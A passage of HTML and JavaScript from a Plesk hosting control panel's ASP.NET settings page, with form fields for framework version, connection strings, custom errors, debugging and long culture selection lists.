help.href = help.href + '/plesk-context/aspdotnet_dom/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function update_oC(f)
{
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

function restore_default_oC(f)
{
   if (!confirm("Restore default ASP.NET settings?"))
       return false;
   f.cmd.value = "restore_default";
   lsubmit(f);
   return false;
}
function custom_errors_status_check(val) {
   if (!chk_uint(val))
       return "Number is invalid.";
   return true;
}
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/aspdotnet/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       
<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-change-version" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Change ASP.NET version used by this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;" style=""><BUTTON name="bname_change-version" id="buttonid-change-version" type="button" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;">Change Version</BUTTON><SPAN id="spanid-change-version">Change Version</SPAN></DIV>
           <DIV class="commonButton" id="bid-restore-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore server default ASP.NET settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_restore_default" id="buttonid-restore-default" type="button" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;">Set to Default</BUTTON><SPAN id="spanid-restore-default">Set to Default</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>


<div class="formArea">


<fieldset>

<legend>Framework Version</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-version">Version</label></td>
           <td>


   2.0.50727.4927<input type="hidden" name="version" value="2.0.50727.4927">








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Connection String Manager</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-conn_strings">Connection strings</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="conn_strings"></div><script>
var conn_strings_columns = new Array();
conn_strings_columns[0] = new Array();
conn_strings_columns[0]['size'] = 30;
conn_strings_columns[0]['name'] = 'conn_string_name';
conn_strings_columns[0]['text'] = 'Name';
conn_strings_columns[0]['type'] = 'text';
conn_strings_columns[0]['editable'] = false;
conn_strings_columns[0]['required'] = true;
conn_strings_columns[0]['primary'] = true;
conn_strings_columns[0]['check'] = null;
conn_strings_columns[1] = new Array();
conn_strings_columns[1]['size'] = 70;
conn_strings_columns[1]['name'] = 'conn_string_value';
conn_strings_columns[1]['text'] = 'Connection Parameters';
conn_strings_columns[1]['type'] = 'text';
conn_strings_columns[1]['editable'] = true;
conn_strings_columns[1]['required'] = true;
conn_strings_columns[1]['primary'] = false;
conn_strings_columns[1]['check'] = null;
var conn_strings_data = new Array();
var conn_strings_can_delete = new Array();
var conn_strings_additional_data = new Array();
conn_strings_data[0] = new Array('LocalSqlServer', 'data source=.\\SQLEXPRESS;Integrated Security=SSPI;AttachDBFilename=|DataDirectory|aspnetdb.mdf;User Instance=true');
conn_strings_can_delete[0] = true;
conn_strings_additional_data[0] = '';
var conn_stringsEditListObj = new psaEditList('conn_strings', true);
conn_stringsEditListObj.setColumns(conn_strings_columns);
conn_stringsEditListObj.setAllData(conn_strings_data, conn_strings_can_delete);
conn_stringsEditListObj.setAllAdditionalData(conn_strings_additional_data);
conn_stringsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
conn_stringsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
conn_stringsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
conn_stringsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
conn_stringsEditListObj.render('conn_strings');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Custom Error Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-custom_err_mode">Custom error mode</label></td>
           <td>



   <select name="custom_err_mode" id="fid-custom_err_mode" >    <option value='On'>On</option>
   <option value='Off'>Off</option>
   <option value='RemoteOnly' SELECTED>RemoteOnly</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-custom_errors">Custom errors</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="custom_errors"></div><script>
var custom_errors_columns = new Array();
custom_errors_columns[0] = new Array();
custom_errors_columns[0]['size'] = 30;
custom_errors_columns[0]['name'] = 'custom_error_status';
custom_errors_columns[0]['text'] = 'Status Code';
custom_errors_columns[0]['type'] = 'text';
custom_errors_columns[0]['editable'] = false;
custom_errors_columns[0]['required'] = true;
custom_errors_columns[0]['primary'] = true;
custom_errors_columns[0]['check'] = custom_errors_status_check;
custom_errors_columns[1] = new Array();
custom_errors_columns[1]['size'] = 70;
custom_errors_columns[1]['name'] = 'custom_error_redirect';
custom_errors_columns[1]['text'] = 'Redirect URL';
custom_errors_columns[1]['type'] = 'text';
custom_errors_columns[1]['editable'] = true;
custom_errors_columns[1]['required'] = true;
custom_errors_columns[1]['primary'] = false;
custom_errors_columns[1]['check'] = null;
var custom_errors_data = new Array();
var custom_errors_can_delete = new Array();
var custom_errors_additional_data = new Array();
var custom_errorsEditListObj = new psaEditList('custom_errors', true);
custom_errorsEditListObj.setColumns(custom_errors_columns);
custom_errorsEditListObj.setAllData(custom_errors_data, custom_errors_can_delete);
custom_errorsEditListObj.setAllAdditionalData(custom_errors_additional_data);
custom_errorsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
custom_errorsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
custom_errorsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
custom_errorsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
custom_errorsEditListObj.render('custom_errors');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Compilation and Debugging</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-def_language">Default web page language</label></td>
           <td>



   <select name="def_language" id="fid-def_language" >    <option value='c#'>c#</option>
   <option value='vb' SELECTED>vb</option>
   <option value='js'>js</option>
   <option value='vj#'>vj#</option>
   <option value='c++'>c++</option>
   <option value='c++7'>c++7</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-debug_mode">Switch on debugging</label></td>
           <td>







   <input type="checkbox" class="checkbox" name="debug_mode" id="fid-debug_mode" value="true" >



           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Globalization Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-req_enc">Request encoding</label></td>
           <td>






   <input type="text" name="req_enc" id="fid-req_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-res_enc">Response encoding</label></td>
           <td>






   <input type="text" name="res_enc" id="fid-res_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-file_enc">File encoding</label></td>
           <td>






   <input type="text" name="file_enc" id="fid-file_enc" value="Windows-1252"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-culture">Culture</label></td>
           <td>



   <select name="culture" id="fid-culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokm..l (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-ui_culture">UI Culture</label></td>
           <td>



   <select name="ui_culture" id="fid-ui_culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokm..l (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
